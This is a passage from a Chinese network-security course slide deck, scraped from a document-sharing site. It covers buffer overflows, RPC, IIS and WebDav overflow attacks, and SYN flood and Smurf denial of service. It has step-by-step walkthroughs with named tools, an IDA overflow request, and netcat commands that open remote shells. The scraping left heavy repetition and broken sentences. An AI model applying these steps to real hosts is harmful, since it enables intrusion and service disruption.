39、在strcpy函數(shù)這樣問題的C語言函數(shù)還有：strcat()、gets()、scanf()等。 牛牛文庫文檔分享引言void function(char * szPara1引言void function(char * szPara1)char buff16;strcpy(buffer, szPara1);程序中利用strcpy函數(shù)將szPara1中的內(nèi)容拷貝到buff中，只要szPara1的長度大于16，就會(huì)造成緩沖區(qū)溢出。存在strcpy函數(shù)這樣問題的C語言函數(shù)還有：strcat()、gets()、scanf()等。 牛牛文庫文檔分享引言void function(char * szPara

40、1緩存區(qū)溢出歷史緩存區(qū)溢出歷史1988年的Morris蠕蟲病毒，成功攻擊了6000多臺(tái)機(jī)器：利用UNIX服務(wù)finger中的緩沖區(qū)溢出漏洞來獲得訪問權(quán)限，得到一個(gè)shell1996年前后，開始出現(xiàn)大量的Buffer Overflow攻擊，因此引起人們的廣泛關(guān)注源碼開放的操作系統(tǒng)首當(dāng)其沖隨后，Windows系統(tǒng)下的Buffer Overflows也相繼被發(fā)掘出來已經(jīng)有一些非常經(jīng)典細(xì)致的文章來介紹與Buffer overflows有關(guān)的技術(shù) 牛牛文庫文檔分享緩存區(qū)溢出歷史緩存區(qū)溢出歷史 牛牛緩沖區(qū)溢出的基本介紹基本的思想通過修改某些內(nèi)存區(qū)域，把一段惡意代碼存儲(chǔ)到一個(gè)buffer中，并且使這個(gè)buf

41、fer被溢出，以便當(dāng)前進(jìn)程被非法利用(執(zhí)行這段惡意的代碼) 牛牛文庫文檔分享緩沖區(qū)溢出的基本介紹基本的思想 ?！癝QL Slammer”蠕蟲王的發(fā)作原理，就是利用未及時(shí)更新補(bǔ)丁的MS SQL Server數(shù)據(jù)庫緩沖溢出漏洞。采用不正確的方式將數(shù)據(jù)發(fā)到MS Sql Server的監(jiān)聽端口，這個(gè)錯(cuò)誤可以引起緩沖溢出攻擊。出現(xiàn)的MSBLAST病毒正是利用了微軟關(guān)于RPC 接口中遠(yuǎn)程任意可執(zhí)行代碼漏洞，“中招”的機(jī)器會(huì)反復(fù)重啟，或者拷貝、粘貼功能不工作等現(xiàn)象。僅去年緩沖區(qū)溢出就占使 CERT/CC 提出建議的所有重大安全性錯(cuò)誤的百分之五十以上。并且數(shù)據(jù)顯示這一問題正在擴(kuò)大，而不是在縮減。 緩沖區(qū)溢出的

42、實(shí)例 牛牛文庫文檔分享“SQL Slammer”蠕蟲王的發(fā)作原理，就是利用未及時(shí)更緩沖區(qū)溢出的保護(hù)方法 編寫正確的代碼 最簡單的方法就是用grep來搜索源代碼中容易產(chǎn)生漏洞的庫的調(diào)用 為了對付這些問題，人們已經(jīng)開發(fā)了一些高級的查錯(cuò)工具，如faultinjection等。這些工具的目的在于通過人為隨機(jī)地產(chǎn)生一些緩沖區(qū)溢出來尋找代碼的安全漏洞。 牛牛文庫文檔分享緩沖區(qū)溢出的保護(hù)方法 編寫正確的代碼 www.niuwk.c緩沖區(qū)溢出的保護(hù)方法 非執(zhí)行的緩沖區(qū) 通過使被攻擊程序的數(shù)據(jù)段地址空間不可執(zhí)行，從而使得攻擊者不可能執(zhí)行被植入被攻擊程序輸入緩沖區(qū)的代碼，這種技術(shù)被稱為非執(zhí)行的緩沖區(qū)技術(shù)。事實(shí)上，

43、很多老的Unix系統(tǒng)都是這樣設(shè)計(jì)的，但是近來的Unix和MS Windows系統(tǒng)為實(shí)現(xiàn)更好的性能和功能，往往在數(shù)據(jù)段中動(dòng)態(tài)地放人可執(zhí)行的代碼。所以為了保持程序的兼容性不可能使得所有程序的數(shù)據(jù)段不可執(zhí)行。但是我們可以設(shè)定堆棧數(shù)據(jù)段不可執(zhí)行，這樣就可以最大限度地保證了程序的兼容性。 牛牛文庫文檔分享緩沖區(qū)溢出的保護(hù)方法 非執(zhí)行的緩沖區(qū) www.niuwk.c緩沖區(qū)溢出的保護(hù)方法數(shù)組邊界檢查 程序指針完整性檢查 牛牛文庫文檔分享緩沖區(qū)溢出的保護(hù)方法數(shù)組邊界檢查 RPC漏洞溢出遠(yuǎn)程過程調(diào)用RPC（Remote Procedure Call)，是操作系統(tǒng)的一種消息傳遞功能，允許應(yīng)用程序呼叫網(wǎng)絡(luò)上的計(jì)算機(jī)

44、。當(dāng)系統(tǒng)啟動(dòng)的時(shí)候，自動(dòng)加載RPC服務(wù)?？梢栽诜?wù)列表中看到系統(tǒng)的RPC服務(wù)，如圖5-35所示。1 牛牛文庫文檔分享 RPC漏洞溢出遠(yuǎn)程過程調(diào)用RPC（Remote Proce利用RPC漏洞建立超級用戶 RPC溢出漏洞，對SP4也適用，必須打?qū)Ｓ醚a(bǔ)丁。利用工具scanms.exe文件檢測RPC漏洞，該工具是ISS安全公司2003年7月30日發(fā)布的，運(yùn)行在命令行下用來檢測指定IP地址范圍內(nèi)機(jī)器是否已經(jīng)安裝了“DCOM RPC 接口遠(yuǎn)程緩沖區(qū)溢出漏洞（823980-MS03-026）”補(bǔ)丁程序。如果沒有安裝補(bǔ)丁程序，該IP地址就會(huì)顯示出“VULN”。首先拷貝該文件到C盤根目錄，現(xiàn)在要檢查地址段09

45、到10的主機(jī)，執(zhí)行命令“scanms.exe 09-10”，檢查過程如圖5-36所示。 牛牛文庫文檔分享利用RPC漏洞建立超級用戶 RPC溢出漏洞，對SP4也適用，檢查緩沖區(qū)溢出漏洞 牛牛文庫文檔分享檢查緩沖區(qū)溢出漏洞 牛牛文庫文檔分利用緩沖區(qū)溢出漏洞攻擊利用工具軟件attack.exe對09進(jìn)行攻擊。攻擊的結(jié)果將在對方計(jì)算機(jī)上建立一個(gè)具有管理員權(quán)限的用戶，并終止了對方的RPC服務(wù)。新建用戶的用戶名和密碼都是qing10，這樣就可以登錄對方計(jì)算機(jī)了，RPC服務(wù)停止操作系統(tǒng)將有許多功能不能使用，非常容易被管理員發(fā)現(xiàn)，使用工具軟件OpenRpcSs.exe來給對方重啟RPC服務(wù)。攻擊的全過程如圖5

46、-37所示。 牛牛文庫文檔分享利用緩沖區(qū)溢出漏洞攻擊利用工具軟件attack.exe對17攻擊的全過程 牛牛文庫文檔分享攻擊的全過程 牛牛文庫文檔分享IIS溢出原理IIS緩沖區(qū)溢出IIS：windows系統(tǒng)上最不安全的服務(wù)ISAPI提供對管理腳本(.ida文件)和Inernet數(shù)據(jù)(.idq)查詢的支持向idq.dll發(fā)送一個(gè)過量的變量GET /null.ida? buffer=X HTTP/1.1Host: 任意值一些具體的攻擊方法沒有公開Code Red蠕蟲利用了這一漏洞2 牛牛文庫文檔分享IIS溢出原理IIS緩沖區(qū)溢出2 利用IIS溢出進(jìn)行攻擊案例5-11 利用IIS溢出入侵系統(tǒng)利用軟件

47、Snake IIS溢出工具可以讓對方的IIS溢出，還可以捆綁執(zhí)行的命令和在對方計(jì)算機(jī)上開辟端口，工具軟件的主界面如圖5-38所示。2 牛牛文庫文檔分享利用IIS溢出進(jìn)行攻擊案例5-11 利用IIS溢出入侵系統(tǒng)2該軟件適用于各種類型的操作系統(tǒng)，比如對09進(jìn)行攻擊，09的操作系統(tǒng)的Windows 2000，沒有安裝補(bǔ)丁程序，攻擊完畢后，開辟一個(gè)813端口，并在對方計(jì)算機(jī)上執(zhí)行命令“dir c:”設(shè)置如圖5-39所示。利用IIS溢出進(jìn)行攻擊2 牛牛文庫文檔分享該軟件適用于各種類型的操作系統(tǒng)，比如對點(diǎn)擊按鈕“IDQ溢出”，出現(xiàn)攻擊成功的提示框，如圖5-40所示。2利用IIS溢出進(jìn)行攻擊 牛牛文庫文檔分

48、享點(diǎn)擊按鈕“IDQ溢出”，出現(xiàn)攻擊成功的提示框，如圖5-40所這個(gè)時(shí)候，813端口已經(jīng)開放，利用工具軟件nc.exe連接到該端口，將會(huì)自動(dòng)執(zhí)行剛才發(fā)送的DOS命令“dir c:”，使用的語法是：nc.exe -vv 09 813，其中-vv是程序的參數(shù)，813是目標(biāo)端口?？梢钥吹矫畹膱?zhí)行結(jié)果，如圖5-41所示。利用IIS溢出進(jìn)行攻擊2 牛牛文庫文檔分享這個(gè)時(shí)候，813端口已經(jīng)開放，利用工具軟件nc.exe連接到監(jiān)聽本地端口 下面利用nc.exe和snake工具的另外一種組合入侵對方計(jì)算機(jī)。首先利用nc.exe命令監(jiān)聽本地的813端口。使用的基本語法是“nc -l -p 813”，執(zhí)行的過程如

49、圖5-42所示。 牛牛文庫文檔分享監(jiān)聽本地端口 下面利用nc.exe和snake工具的另外一種這個(gè)窗口就這樣一直保留，啟動(dòng)工具軟件snake，本地的IP地址是10，要攻擊的計(jì)算機(jī)的IP地址是09，選擇溢出選項(xiàng)中的第一項(xiàng)，設(shè)置IP為本地IP地址，端口是813，如圖5-43所示。監(jiān)聽本地端口 牛牛文庫文檔分享這個(gè)窗口就這樣一直保留，啟動(dòng)工具軟件snake，本地的IP地設(shè)置好以后，點(diǎn)擊按鈕“IDQ溢出”，程序顯示對話框如圖4-44所示。監(jiān)聽本地端口 牛牛文庫文檔分享設(shè)置好以后，點(diǎn)擊按鈕“IDQ溢出”，程序顯示對話框如圖4-4查看nc命令的DOS框，在該界面下，已經(jīng)執(zhí)行了設(shè)置的DOS命令。將對方計(jì)算機(jī)

50、的C盤根目錄列出來，如圖4-45所示。監(jiān)聽本地端口 牛牛文庫文檔分享查看nc命令的DOS框，在該界面下，已經(jīng)執(zhí)行了設(shè)置的DOS命IIS默認(rèn)提供了對WebDav的支持，通過WebDav可以通過HTTP向用戶提供遠(yuǎn)程文件存儲(chǔ)的服務(wù)。但是WebDav使用了ntDll.dll函數(shù)，這個(gè)函數(shù)對在長度檢查中存在一個(gè)整數(shù)溢出問題，可以利用此漏洞獲取權(quán)限。WebDav遠(yuǎn)程溢出原理3 牛牛文庫文檔分享IIS默認(rèn)提供了對WebDav的支持，通過WebDav可以通需要使用工具軟件nc.exe和webdavx3.exe，首先在DOS命令行下執(zhí)行webdavx3.exe，如果執(zhí)行的話，該程序?qū)⑻崾疽呀?jīng)過期了，如圖4-4

51、6所示。利用WebDav遠(yuǎn)程溢出3 牛牛文庫文檔分享需要使用工具軟件nc.exe和webdavx3.exe，首先攻擊修改本地系統(tǒng)時(shí)間到2001年，這樣就可以攻擊了，在命令后面直接跟對方的IP地址就可以了，現(xiàn)在要攻擊的計(jì)算機(jī)是09，執(zhí)行情況如圖4-47所示。 牛牛文庫文檔分享攻擊修改本地系統(tǒng)時(shí)間到2001年，這樣就可以攻擊了，在命令后入侵對方的計(jì)算機(jī)該程序不能自動(dòng)退出，當(dāng)發(fā)現(xiàn)程序長時(shí)間沒有反映的時(shí)候，需要手工按下“CTRL+C”退出程序。該程序在對方的計(jì)算機(jī)上開了一個(gè)端口7788，依然可以nc.exe程序入侵對方的計(jì)算機(jī)，過程如圖4-48所示。 牛牛文庫文檔分享入侵對方的計(jì)算機(jī)該程序不能自動(dòng)退出

52、，當(dāng)發(fā)現(xiàn)程序長時(shí)間沒有反映拒絕服務(wù)攻擊5.7 SYN風(fēng)暴1Smurf攻擊2 利用處理程序錯(cuò)誤進(jìn)行攻擊 3 牛牛文庫文檔分享拒絕服務(wù)攻擊5.7 SYN風(fēng)暴1Smurf攻擊2 利用處拒絕服務(wù)攻擊介紹拒絕服務(wù)攻擊的簡稱是：DoS（Denial of Service）攻擊，凡是造成目標(biāo)計(jì)算機(jī)拒絕提供服務(wù)的攻擊都稱為DoS攻擊，其目的是使目標(biāo)計(jì)算機(jī)或網(wǎng)絡(luò)無法提供正常的服務(wù)。最常見的DoS攻擊是：計(jì)算機(jī)網(wǎng)絡(luò)帶寬攻擊和連通性攻擊。帶寬攻擊是以極大的通信量沖擊網(wǎng)絡(luò)，使網(wǎng)絡(luò)所有可用的帶寬都被消耗掉，最后導(dǎo)致合法用戶的請求無法通過。連通性攻擊指用大量的連接請求沖擊計(jì)算機(jī)，最終導(dǎo)致計(jì)算機(jī)無法再處理合法用戶的請求。

53、牛牛文庫文檔分享拒絕服務(wù)攻擊介紹拒絕服務(wù)攻擊的簡稱是：DoS（Denial DoS的技術(shù)歷史早期的Internet蠕蟲病毒Robert Morris的RTM蠕蟲消耗網(wǎng)絡(luò)資源分片裝配，非法的TCP標(biāo)志，SYN Flood，等利用系統(tǒng)實(shí)現(xiàn)上的缺陷，點(diǎn)對點(diǎn)形式Ping of Death, IP分片重疊分布式DoS(DDoS)攻擊最著名的smurf攻擊 牛牛文庫文檔分享DoS的技術(shù)歷史早期的Internet蠕蟲病毒www.niu針對不同的系統(tǒng)，攻擊的結(jié)果可能不同，但是攻擊的根本都是利用這些系統(tǒng)中TCP/IP協(xié)議族的設(shè)計(jì)弱點(diǎn)和缺點(diǎn).只有對現(xiàn)有TCP/IP協(xié)議族進(jìn)行重大改變才能修正這些缺陷。目前還沒有一個(gè)

54、完整的解決方案，但是可以采取一些措施盡量降低這種攻擊發(fā)生的可能性，減少損失。SYN風(fēng)暴1 牛牛文庫文檔分享針對不同的系統(tǒng)，攻擊的結(jié)果可能不同，但是攻擊的根本都是利用這IP協(xié)議是Internet網(wǎng)絡(luò)層的標(biāo)準(zhǔn)協(xié)議，提供了不可靠的無連接的網(wǎng)絡(luò)分組傳輸服務(wù)。IP協(xié)議的基本數(shù)據(jù)傳輸單元成為網(wǎng)絡(luò)包。TCP協(xié)議位于IP協(xié)議和應(yīng)用層協(xié)議之間，提供了可靠的面向連接數(shù)據(jù)流傳輸服務(wù)。TCP通過流控制機(jī)制和重傳等技術(shù)來實(shí)現(xiàn)可靠的數(shù)據(jù)報(bào)傳輸。SYN風(fēng)暴背景介紹 牛牛文庫文檔分享IP協(xié)議是Internet網(wǎng)絡(luò)層的標(biāo)準(zhǔn)協(xié)議，提供了不可靠的無握手的第一報(bào)文段的碼元字段的SYN為被置1.第二個(gè)報(bào)文的SYN和ACK問均被置1，指

55、出這是對第一個(gè)SYN報(bào)文段的確認(rèn)并繼續(xù)握手操作。最后一個(gè)握手報(bào)文僅僅是一個(gè)確認(rèn)信息，通知目標(biāo)主機(jī)已成功建立了雙方所同意的這個(gè)連接。SYN風(fēng)暴背景介紹 牛牛文庫文檔分享握手的第一報(bào)文段的碼元字段的SYN為被置1.第二個(gè)報(bào)文的SY針對每個(gè)連接，連接雙方都要為該連接分配以下內(nèi)存資源。（1）socket結(jié)構(gòu)：描述所使用的協(xié)議、狀態(tài)信息、地址信息、連接隊(duì)列、緩沖區(qū)和其他標(biāo)志位等。（2）Internet協(xié)議控制塊結(jié)構(gòu)：描述TCP狀態(tài)信息、IP地址、端口號、IP頭原型、目標(biāo)地址及其其他選項(xiàng)等。（3）TCP控制塊結(jié)構(gòu)：描述時(shí)鐘信息、序列號、流控制信息及帶外數(shù)據(jù)等。SYN風(fēng)暴背景介紹 牛牛文庫文檔分享針對每個(gè)連

56、接，連接雙方都要為該連接分配以下內(nèi)存資源。SYN風(fēng)SYN-SENTESTAB-LISHEDSYN-RCVDLISTENESTAB-LISHED用三次握手建立 TCP 連接的各狀態(tài) SYN = 1, seq = xACK = 1, seq = x + 1, ack = y 1CLOSEDCLOSED數(shù)據(jù)傳送主動(dòng)打開被動(dòng)打開AB客戶服務(wù)器SYN = 1, ACK = 1, seq = y, ack= x 1 牛牛文庫文檔分享SYN-ESTAB-SYN-LISTENESTAB-用三次握在B返回一個(gè)確認(rèn)的SYN-ACK包的時(shí)候有個(gè)潛在的弊端，他可能不會(huì)接到A回應(yīng)的ACK包。這個(gè)也就是所謂的半開放連接，

57、B需要耗費(fèi)一定的數(shù)量的系統(tǒng)內(nèi)存來等待這個(gè)未決的連接，雖然這個(gè)數(shù)量是受限的，但是惡意者可以通過創(chuàng)建很多的半開放式連接來發(fā)動(dòng)SYN洪水攻擊。SYN風(fēng)暴攻擊手段 牛牛文庫文檔分享在B返回一個(gè)確認(rèn)的SYN-ACK包的時(shí)候有個(gè)潛在的弊端，他可通過ip欺騙可以很容易的實(shí)現(xiàn)半開放連接。攻擊者發(fā)送SYN包給受害者系統(tǒng)，這個(gè)看起來是合法的，但事實(shí)上所謂的C根本不會(huì)回應(yīng)這個(gè)。SYN-ACK報(bào)文，這意味著受害者將永遠(yuǎn)不會(huì)接到ACK報(bào)文。而此時(shí)，半開放連接將最終耗用受害者所有的系統(tǒng)資源，受害者將不能再接收任何其他的請求。SYN風(fēng)暴攻擊手段 牛牛文庫文檔分享通過ip欺騙可以很容易的實(shí)現(xiàn)半開放連接。攻擊者發(fā)送SYN包給通

58、常等待ACK返回包有超時(shí)限制，所以半開放，連接將最終超時(shí)，而受害者系統(tǒng)也會(huì)自動(dòng)修復(fù)。雖然這樣，但是在受害者系統(tǒng)修復(fù)之前，攻擊者可以很容易的一直發(fā)送虛假的SYN請求包來持續(xù)攻擊。SYN風(fēng)暴攻擊手段 牛牛文庫文檔分享通常等待ACK返回包有超時(shí)限制，所以半開放，連接將最終超時(shí)，在大多數(shù)情況下，受害者幾乎不能接受任何其他的請求，但是這種攻擊不會(huì)影響到已經(jīng)存在的進(jìn)站或者是出站連接。雖然這樣，受害者系統(tǒng)還是可能耗盡系統(tǒng)資源，以導(dǎo)致其他種種問題。攻擊系統(tǒng)的位置幾乎是不可確認(rèn)的，因?yàn)镾YN包中的源地址多數(shù)都是虛假的。當(dāng)SYN包到達(dá)受害者系統(tǒng)的時(shí)候，沒有辦法找到他的真實(shí)地址。SYN風(fēng)暴攻擊手段 牛牛文庫文檔分享

59、在大多數(shù)情況下，受害者幾乎不能接受任何其他的請求，但是這種攻SYN風(fēng)暴攻擊過程 SYN-RCVDLISTEN偽造源地址的SYN包Port flooding occursCLOSEDCLOSED被動(dòng)打開AB攻擊者A目標(biāo)主機(jī)BSYN + ACK 牛牛文庫文檔分享SYN風(fēng)暴攻擊過程 SYN-LISTEN偽造源地址的SYN包常用的防范方法包括5個(gè)方面：1、優(yōu)化系統(tǒng)配置： 縮短超時(shí)時(shí)間； 增加半連接隊(duì)列的長度關(guān)閉不重要的服務(wù)2、優(yōu)化路由器配置：配置路由器的外網(wǎng)卡配置路由器的內(nèi)網(wǎng)卡分析與對抗 牛牛文庫文檔分享常用的防范方法包括5個(gè)方面：分析與對抗www.niuwk.c3、完善基礎(chǔ)設(shè)施4、使用防火墻：5、主

60、動(dòng)監(jiān)視分析與對抗 牛牛文庫文檔分享3、完善基礎(chǔ)設(shè)施分析與對抗 牛牛文Smurf攻擊是以最初發(fā)動(dòng)這種攻擊的程序名Smurf來命名的。這種攻擊方法結(jié)合使用了IP欺騙和帶有廣播地址的ICMP請求-響應(yīng)方法使大量網(wǎng)絡(luò)傳輸充斥目標(biāo)系統(tǒng)，引起目標(biāo)系統(tǒng)拒絕為正常系統(tǒng)進(jìn)行服務(wù)，屬于間接、借力攻擊方式。任何連接到互聯(lián)網(wǎng)上的主機(jī)或其他支持ICMP請求-響應(yīng)的網(wǎng)絡(luò)設(shè)備都可能成為這種攻擊的目標(biāo)。Smurf攻擊2 牛牛文庫文檔分享Smurf攻擊是以最初發(fā)動(dòng)這種攻擊的程序名Smurf來命名的原理：攻擊者偽造一個(gè)ICMP echo請求包，其源地址為目標(biāo)受害者地址，目的地址為中間脆弱網(wǎng)絡(luò)的廣播地址，并將該echo請求包發(fā)送到